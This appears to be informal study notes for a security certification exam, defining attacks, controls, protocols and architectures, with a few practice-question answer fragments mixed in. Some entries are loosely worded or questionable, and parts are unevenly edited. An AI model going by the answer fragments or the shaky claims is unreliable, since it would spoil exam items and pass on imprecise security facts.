In the context of a Gap Analysis for security, the “Security Delta“ refers to the difference between the current security measures in place and the desired or required state as outlined in the security policy or framework.
digital signature is used to verify the authenticity and integrity of a message or document
End-of-life systems are those that are no longer supported by their manufacturer and do not receive security updates or patches
Agentless software operates without needing to be installed on the target system
Access Control List (ACL) is a list that specifies which users or groups have access to certain resources and what actions they can perform,
unskilled attacker, often referred to as a “script kiddie,“ typically lacks advanced hacking skills
buffer overflow attack occurs when an application receives more data than it can handle, causing the excess data to overflow into adjacent memory locations
host-based firewall is a software firewall installed on individual hosts or devices.
Trojan is a type of malware that disguises itself as a legitimate application or file. However, once executed, it delivers a malicious payload, potentially harming the system or stealing data.
Vulnerabilities that exist within specific applications, often due to issues like improper input validation, logic errors, or insecure configurations, are considered application-level vulnerabilities
Managed service providers (MSPs) offer a range of IT services to businesses, including helpdesk services
birthday attack is based on the birthday paradox in probability theory. In the context of cryptography, it refers to the likelihood that two different sets of data will produce the same hash value in a set of randomly generated data
Bluetooth spoofing involves an unauthorized device pretending to be a known or trusted Bluetooth device
Firmware exploitation targets vulnerabilities in the software that controls hardware devices
zero-day exploit, especially one that hasn‘t been seen before, indicates a high level of sophistication
Supply chain vulnerabilities arise from weaknesses in the process of creating, delivering, and maintaining products or services.
Time-of-use (TOU) refers to the moment when a system uses a condition or state. 
If an attacker can alter the system‘s state after it has been checked (TOC) but before it is used (TOU), they can exploit this type of race condition.
An injection attack involves inserting malicious data or commands into an application, often with the intent of targeting databases i.e. SQL injection
environmental attack can involve manipulating factors like temperature, humidity, or lighting to cause harm or disruption
wireless attack involves targeting wireless networks, either to gain unauthorized access or to eavesdrop on communications
 “blocked content“ indicator suggests that certain content, requests, or actions are being blocked by security measures
Cryptographic vulnerabilities occur when encryption algorithms are implemented incorrectly, use weak or compromised keys, or when outdated cryptographic methods are used.
Buffer overflow vulnerabilities can be exploited using shellcode, which is a small piece of code used to provide an attacker with control over a system
Race conditions occur when the behavior of a system depends on the relative timing of events, such as the timing between checking a condition and using it.
Unsupported systems and applications are those that no longer receive security updates, patches, or vendor support. 
Isolation involves keeping systems or components separate to prevent potential threats or failures from spreading.
A watering hole attack involves compromising a website frequently visited by a specific group or organization
Cross-site scripting (XSS) is a web-based vulnerability where attackers inject malicious scripts into web pages.
A downgrade attack involves manipulating a system or communication to use a weaker encryption algorithm or protocol version.
Cloud-specific vulnerabilities are unique to cloud environments and arise due to the shared, scalable, and on-demand nature of cloud services.
Cross-site scripting (XSS) allows attackers to inject malicious scripts into web pages. When executed, these scripts can steal session cookies, user data, or perform actions on behalf of the user without their knowledge.
level of sophistication reflects a threat actor‘s capability, including their ability to execute prolonged and stealthy attacks
System hardening involves implementing measures to secure a system by reducing its attack surface and minimizing vulnerabilities. 
Typosquatting involves registering domain names that are typographical errors or common misspellings of popular websites.
A virtual machine (VM) escape vulnerability in a cloud environment allows an attacker to bypass the VM‘s isolation mechanisms and gain unauthorized access to the host system or other VMs.
A homograph attack is a variation of typosquatting where attackers use characters from different alphabets that visually resemble the intended characters.
Suppliers are responsible for providing products or components that meet the specifications and quality standards set by the purchasing company.


 installation of endpoint protection involves adding software to endpoints (like computers and mobile devices) to detect, prevent, and respond to malware and other malicious activities.
Misinformation involves spreading false or inaccurate information without necessarily having a malicious intent. 

Decommissioning is the process of safely removing or retiring systems, hardware, or software from active use
Excessive resource consumption can indicate that an attacker is trying to overload a system or applicatio
A service provider compromise occurs when a third-party service provider fails to secure their systems or services, potentially leading to vulnerabilities that affect their customers or clients.

A replay attack involves capturing valid data packets and then retransmitting them.
A Host-based Intrusion Prevention System (HIPS) is designed to detect and prevent malicious activities at the host level.

Suppliers, by providing components or products, have the ability to introduce compromised hardware or software into an organization‘s environment.
Client-based software requires installation on the client‘s system to function. 
Malicious code refers to software or scripts that are introduced into a system with the intent to cause harm, steal data, or perform other malicious actions. 
Phishing is a form of social engineering where attackers send deceptive emails to individuals, attempting to trick them into revealing sensitive information, downloading malware, or clicking on malicious links.
Data exfiltration refers to the unauthorized transfer of data from within an organization to an external destination. 
 amplified DDoS attack, the attacker exploits third-party servers to amplify the amount of traffic sent to the victim
A virus is a type of malware that attaches itself to a host file. When the host file is executed, the virus can spread to other files and systems. Viruses rely on user action, such as opening an infected file, to propagate.
A logic bomb is a type of malware that lies dormant until a specific condition or trigger event occurs. In this case, the trigger is the opening of a specific application, at which point the logic bomb activates and executes its malicious payload.

Business email compromise (BEC) is a sophisticated scam where attackers compromise legitimate business email accounts to deceive employees, partners, or vendors into transferring money or revealing sensitive information.
A collision attack in cryptography involves finding two different sets of data that produce the same hash value.
A credential replay attack involves capturing authentication credentials, such as usernames and passwords, and then reusing them to gain unauthorized access to a system.
Out-of-cycle logging refers to log entries that occur outside of regular business hours or expected usage patterns.
Flaws in the way an operating system manages memory allocation, handles processes, or interacts with hardware are considered operating system (OS)-based vulnerabilities.
amplified DDoS attack, the attacker uses multiple compromised devices to send small requests to third-party servers.
Resource inaccessibility refers to situations where users are unable to access certain files, services, or resources. 


Wireless networks, due to their broadcast nature, are susceptible to “man-in-the-middle“ attacks. 
Attackers can intercept and potentially modify data transmitted between two parties without either party knowing.

Vishing, or voice phishing, involves attackers using phone calls to deceive victims into providing personal or financial information. 


A buffer overflow vulnerability occurs when an application does not properly validate or limit the size of data before storing it in a buffer or memory space
This can lead to the overflow of data into adjacent memory, potentially leading to code execution or application crashes.

Software-defined wide area network (SD-WAN)
SD-WAN is a technology that allows organizations to build high-performance WANs using lower-cost and commercially available internet access, providing secure connections between multiple locations


Journaling involves keeping a record of all changes made to data This method allows for recovery to any specific point in time by replaying the changes from the journal

Microservices architecture involves developing an application as a collection of small, independent services that run in their own processes This enhances scalability, as each service can be scaled independently, and maintainability, as each service can be updated or replaced without affecting others
Software-Defined Networking (SDN) decouples the network control plane from the forwarding plane, allowing for a more flexible and programmable network configuration

In a “fail-open“ mode, if the security device encounters a failure, it will default to allowing all traffic to pass through, ensuring continuity of service at the expense of security
Generators are essential for data centers during maintenance or repair activities on the main power source
Next-Generation Firewalls (NGFWs) combine traditional firewall capabilities with other functionalities like application awareness, intrusion prevention, and identity-based controls
Private data classification refers to personal information about individuals that is meant to be kept confidential and not shared widely

Platform diversity refers to the use of various computing platforms within an organization
Power consideration deals with the energy consumption and power requirements of a system
A Virtual Private Network (VPN) allows for the creation of a secure, encrypted connection over the internet, enabling users to access a private network remotely
Obfuscation involves making code or data harder to understand, typically to prevent reverse engineering or unauthorized interpretation

Web Application Firewalls (WAFs) are specifically designed to protect web applications from threats like SQL injection, cross-site scripting, and other web-based attacks

Multi-cloud systems allow organizations to use multiple cloud service providers, offering flexibility in choosing services and avoiding dependence on a single vendor, thus preventing vendor lock-in
In a serverless architecture, developers write code that is executed in response to events The cloud provider automatically manages the infrastructure, including server provisioning and scaling, allowing developers to focus on code
Transport Layer Security (TLS) is a protocol that provides secure communications over the internet by encrypting web traffic, commonly used in web browsers and other applications

A device in tap/monitor mode observes a copy of the network traffic without making any changes or interventions It is used primarily for monitoring and logging purposes
Layer 4 refers to the transport layer in the OSI model Firewalls operating at this layer focus on data like port numbers and protocol identification


Trade secrets refer to proprietary information, formulas, processes, or any information that provides a business advantage over competitors who do not know or use it
Layer 7 firewalls, also known as application-layer firewalls, inspect and make decisions based on the content of the data, including HTTP headers, payloads, and other application-specific data
In a microservices architecture, services often communicate with each other over a network Ensuring secure and authenticated communication between these services is crucial to prevent unauthorized access and potential breaches
SD-WAN technology focuses on optimizing and enhancing the performance of wide area networks by dynamically routing traffic based on current network conditions and application requirements
Load balancing aims to distribute workloads to prevent any single server from being overwhelmed, while clustering groups servers together to provide redundancy and ensure continuous availability
A proxy server acts as an intermediary between end users and the internet, allowing for content filtering, caching, and potentially providing anonymity by masking the user‘s IP address
When selecting effective controls, it‘s crucial to ensure that they are compatible with the existing infrastructure to ensure seamless integration and optimal performance
ICS and SCADA systems are used to control and monitor industrial processes, often in critical infrastructure like power plants, water treatment facilities, and manufacturing

Secure Access Service Edge (SASE) is a cloud-based platform that combines networking and security functions to provide secure access to applications, regardless of where the applications or users are located
Containerization involves encapsulating an application and its dependencies in a “container,“ allowing it to run consistently across different environments
Logical segmentation divides a network into separate segments based on criteria like function, security levels, or organizational structure, which can help in isolating potential security threats
In a “fail-closed“ mode, if the security device encounters a failure, it will default to blocking all traffic, prioritizing security over service availability

8021X is a standard for port-based network access control It provides authentication to devices attached to a LAN port, ensuring that only authenticated devices can access the network
The “technology“ component of capacity planning ensures that the organization has the required hardware, software, and tools to efficiently support its operations and growth
IPSec is a suite of protocols that secures IP communications by authenticating and encrypting each IP packet, ensuring data integrity and confidentiality
A jump server, also known as a bastion host, acts as a bridge between two networks, providing a controlled and monitored means of access, especially in secure network architectures
The inability to patch refers to situations where a system cannot be updated or patched, often due to legacy constraints or compatibility issues
 Web Application Firewall (WAF) is specifically designed to protect web applications by filtering and monitoring HTTP traffic, thereby safeguarding the applications from various web-based attacks
Tokenization involves replacing sensitive data with a non-sensitive token The original data is stored securely, and the token serves as a reference to that data without revealing the actual sensitive information
The “infrastructure“ component of capacity planning pertains to the physical or virtual resources, like data centers, networks, and storage, necessary to support the organization‘s operations
Tunneling involves encapsulating data packets from one network in a format that another network can understand, allowing for data to be securely transmitted over incompatible networks
Offsite backups involve storing backup data in a different physical location from the primary data center This strategy provides protection against localized disasters that might affect the primary location
Regulated data refers to information that is subject to specific regulations imposed by governmental bodies or industry standards, ensuring its protection and confidentiality

Unified Threat Management (UTM) devices offer a comprehensive security solution by integrating multiple functionalities, such as firewall, VPN, antivirus, and more, into a single device
A warm site has the necessary infrastructure and equipment in place but might not have the most up-to-date data It requires some time to become operational after a disaster, but not as much as a cold site
Unified Threat Management (UTM) devices combine multiple security features and functions into a single appliance, offering a comprehensive security solution
IoT devices, often having weaker security measures, can be vulnerable to cyberattacks and can serve as entry points into larger networks
Placing an IDS/IPS at the edge of the network, especially where it interfaces with the internet, provides optimal monitoring and protection against external threats
Masking involves hiding specific portions of data, such as displaying only the last four digits of a credit card number while masking the rest

Next-Generation Firewalls (NGFWs) offer features beyond traditional firewalls, such as application awareness, deep packet inspection, and identity-based controls

While IaC provides many advantages such as consistent setups, reduced manual errors, and version control, it does not inherently enhance the physical security of the infrastructure Physical security measures must be implemented separately
Sensors are devices or modules in a network environment that monitor specific types of data or activities, often sending this data to a centralized system for analysis or action
An Intrusion Detection System (IDS) monitors network traffic for suspicious activities and raises alerts Unlike an IPS, it does not actively block the suspicious traffic
The attack surface refers to all the points where an unauthorized user could potentially access and compromise a system
Layer 4 firewalls, also known as transport layer firewalls, primarily focus on filtering traffic based on attributes like IP address, protocol, and port number
Firewalls are typically placed at the edge of the network to act as a barrier between the internal network and external threats, such as the internet

Centralized systems have a single point of control and authority, while decentralized systems distribute control across multiple points or nodes
An inline security device is placed directly in the traffic flow and can actively intervene, while a device in tap/monitor mode observes a copy of the traffic without being directly in its path
Virtualization enables the creation of virtual instances (or virtual machines) of physical hardware, allowing multiple OS to run on a single physical machine

When dealing with third-party cloud vendors, organizations must be cautious about where their data is stored (data sovereignty) and 
who has access to it Ensuring proper access controls and understanding data residency regulations are crucial for maintaining data security and compliance

The record encryption strategy involves encrypting specific records or fields (such as employee information) within a database or storage system, while leaving other records (like public details) in plaintext. 

Enumeration refers to the process of identifying and documenting the hardware components of a device, such as storage drives, RAM, and adapter cards, before decommissioning. 
Enabling host-based firewalls helps protect user devices from unauthorized access and man-in-the-middle (MitM) attacks, also known as on-path attacks. 
SASE is the best option because it provides secure remote access to cloud-based applications for mobile users.
A change management process ensures that all updates, patches, and system modifications are reviewed, tested, and documented before deployment.
SCAP (Security Content Automation Protocol) is a suite of standards that enable automated vulnerability management, compliance monitoring, and security configuration assessment. It is used to automate the validation and patching of security issues by assessing systems for vulnerabilities and ensuring compliance with security policies.
A Hardware Security Module (HSM) is the best solution for securely storing private keys.
A Data Loss Prevention (DLP) system is designed to monitor and prevent the transmission of sensitive information, such as credit card numbers, outside the organization. 

A keylogger is a type of malware designed to record keystrokes, and it could send data intermittently to an external server at random times. 
The MTBF (Mean Time Between Failures) is a prediction of how often a repairable system will fail.

Instant messaging is commonly used as an attack vector, and one way to help protect against malicious links delivered by instant messaging is a host-based firewall.

Server hardening involves configuring the system to follow security best practices, such as disabling unnecessary services, ensuring that services do not run with privileged accounts, and managing SSL certificates properly.
An Intrusion Prevention System (IPS) is a security control designed to detect and monitor network traffic for suspicious patterns or potential intrusions. 



An IPS can detect, alert, and log an intrusion attempt. The IPS could also
be categorized as a preventive control, since it has the ability to actively
block known attacks.


The incident response process is preparation, detection, analysis,
containment, eradication, recovery, and lessons learned. Once a system has
been contained, any malware or breached user accounts should be removed
from the system.



An RTOS (Real-Time Operating System) is designed to process data and respond to inputs with minimal delay.
for example : UAV or military grade radar tracking system

 An IPS (Intrusion Prevention System) log would provide detailed information about attacks, including attempts to exploit known vulnerabilities on a web server.


best choice for validating login credentials for all usernames and passwords in an authentication system is C. LDAP.


A replay attack involves an attacker capturing network traffic (such as packets from a legitimate session) and then retransmitting it to gain unauthorized access or perform malicious actions. This is a common method used by attackers after capturing packets.


A WAF (Web Application Firewall) examines user input to a browser-based
application and allows or denies traffic based on the expected input.


An IPS (Intrusion Prevention System) monitors network traffic for exploit
attempts such as buffer overflows, cross-site scripting, SQL injections, or other
known exploits.

Key stretching creates a stronger key by extending the key size using additional
cryptographic processes or multiple hashing steps.


Salting adds information to the hashing process to ensure that all password
hashes are unique, even if the passwords themselves are identical.

A data custodian is responsible for the accuracy, privacy, and security of
the data. (kind of like integrity)


data processor performs some type of action to the data, and this is
often a different group within the organization or a third-party company.


An SD-WAN (Software Defined Networking in a Wide Area Network)
network allows users to efficiently communicate directly to cloud-based
applications.


Making a change to the hosts file can be a security concern, and many
systems will prevent this change without elevated permissions. Modifying
the hosts file would be categorized as risky behavior.


An internal self-assessment with audit can verify users have the correct
permissions and all users meet the practice of least privilege.


MIME specification extends the email message format beyond plain text, enabling the transfer of graphics, audio, and video files over the Internet mail system.
S/MIME is an enhanced version of the MIME protocol that enables email security features by providing encryption, authentication, message integrity, and other related services.


IPsec =  a suite of protocols and technologies providing encryption, authentication, and data integrity for network traffic
ESP (Encapsulating Security Payload) in IPsec provides authentication, integrity, and confidentiality by encrypting and optionally authenticating IP packets.
TLS = cryptographic protocol designed to provide secure communications over a computer network and is the successor to SSL
Symmetric encryption is also called secret-key encryption
Asymmetric encryption is also called public-key encryption


TAP (Test Access Point)
A TAP allows the intrusion detection system (IDS) to see all network traffic crossing a link without disrupting the network if the device fails. 
 Stored XSS attack, the attacker injects malicious script code into a website's message board, and the script is stored on the server



application control = most effective againts zero-day attacks
.CRT file (Certificate file): This file contains the public certificate associated with a digital certificate, and it is shared publicly.


When capturing a system image for forensic purposes, what tool should the analyst use to avoid unintentionally
altering the original evidence use a write blocker


Fog computing extends cloud computing by bringing processing closer to the network edge. I


A rainbow table attack is a method of cracking hashed passwords by using a precomputed table of hash values. If passwords are stored without salt, attackers can use these tables to quickly match hash values to plaintext passwords.
SSL (Secure Sockets Layer), such as SSL 2.0 or SSL 3.0, which are vulnerable to various attacks. TLS (Transport Layer Security) is the successor to SSL and is more secure.


Mobile Device Management (MDM) solutions typically offer the following features:
Application management – Helps with the installation, updating, and removal of apps on managed devices.
Remote wiping – Allows an administrator to remotely erase all data from a device, usually in case it’s lost or stolen.
Configuration management – Enables centralized control and configuration of device settings, such as Wi-Fi, VPN, and email profiles.

 TOTP (Time-Based One-Time Password) is a type of multifactor authentication token that generates a new authentication code at fixed time intervals (e.g., every 30 seconds).


A Type 1 hypervisor (also known as a bare-metal hypervisor) runs directly on the physical hardware of the host machine, rather than on an operating system. Since it operates independently of the guest operating systems, it is generally considered more secure because there is a smaller attack surface for potential vulnerabilities to exploit. 


LDAPS (LDAP over SSL/TLS) is the secure version of the LDAP protocol, and it typically operates over TCP port 636. 
TCP port 3389 – This is used for Remote Desktop Protocol (RDP), not for LDAP.
TCP port 389 – This is the standard port for LDAP (without encryption), which transmits data in plaintext.

SYN flooding (a form of Distributed Denial of Service (DDoS) attack) 
Behavioral Network Intrusion Detection System (NIDS) monitors network traffic to detect patterns or anomalies that deviate from normal behavior.


he Rules of Engagement (RoE) document is used to clearly outline the parameters of a penetration test, specifying what is allowed and what is off-limits during the engagement. 

Greg can use Host-based DLP (Data Loss Prevention) to block USB device use. 

ASLR (Address Space Layout Randomization) = MOST effective in combatting buffer overflow attacks
ASLR works by randomizing the memory addresses used by system and application processes, making it more difficult for an attacker to predict the location of specific functions or buffers they are trying to exploit. 

salting is counter to rainbow table attacks

The best approach for maximizing read performance in a situation where data is infrequently written but frequently read would be RAID 5.

The technology in WPA3 that replaces the use of pre-shared keys (PSK) in earlier versions of the WPA standard is SAE (Simultaneous Authentication of Equals).

NULL: Dereferencing a NULL pointer typically causes a segmentation fault or a crash in the program, leading to a denial of service. This is because a NULL pointer does not point to a valid memory location.

Service account: This type of account is designed for automated tasks or services, such as retrieving data from a database. It is typically non-interactive and has the appropriate permissions to access the necessary resources without needing a human user to log in.

Port scanning is a technique used by attackers to detect open or vulnerable ports on a target system. 
The behavior described in the scenario, where a system sends streams of TCP SYN packets (part of the TCP handshake) to port 80 (a common web port) for several hours, 
followed by a pause and then a shift to another IP address, suggests a scanning attempt to probe for open ports on various systems.



Accountability refers to the ability to track and trace actions back to a specific individual or entity. Using a shared account sacrifices accountability



Taint analysis tracks the flow of data through a program, marking variables that contain untrusted or user-provided data. This helps in identifying potential security vulnerabilities, such as SQL injection or cross-site scripting (XSS), where user input could affect the program's behavior.
